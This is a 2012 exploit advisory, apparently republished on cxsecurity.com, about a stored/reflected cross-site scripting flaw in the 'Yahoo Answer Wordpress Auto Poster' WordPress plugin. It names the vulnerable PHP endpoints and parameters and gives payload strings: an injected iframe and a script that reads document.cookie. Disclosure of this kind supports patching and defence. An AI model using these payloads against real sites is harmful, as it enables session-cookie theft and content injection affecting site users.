Yahoo Answer Wordpress Auto Poster Cross Site Scripting

2012.04.17
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################## # Exploit Title: Yahoo Answer Wordpress Auto Poster(Plugin) <= XSS Vulnerability # Date: 16/04/2012 # Author: Ryuzaki Lawlet # Web/Blog: http://justryuz.blogspot.com # Category: webapps # Security:RISK: High # Vendor or Software Link: http://www.tryscripts.org/wordpress/yahoo/ # Google dork: - # Tested on: Linux ################################################## [~]Exploit/p0c : http://localhost:80/[]/[]/process-imported-question.php?catname=[xss] http://localhost:80/[]/[]/editautopilot.php?query=[xss] [~]Proof of Concept: 1.1 he issue can be exploited by an insert on the Created Object function with script code as value. The result is the persistent execution out of the web application context. Strings: >"<<iframe src=tp://justryuz.blogspot.com>3</iframe> OR >"<script>alert(document.cookie)</script> [~]Dem0 : http://www.tryscripts.org/wordpress/yahoo/ FB : www.fb.me/justryuz +---------------------------------------------------+ Greetz to : [ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,] [ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC = LoneLy CyberSEC = b0ogle ] [ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ] -----------------------------------------------------+ CyberSEC 2012 All rights reserved.

References:

http://www.tryscripts.org/wordpress/yahoo/
http://www.fb.me/justryuz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top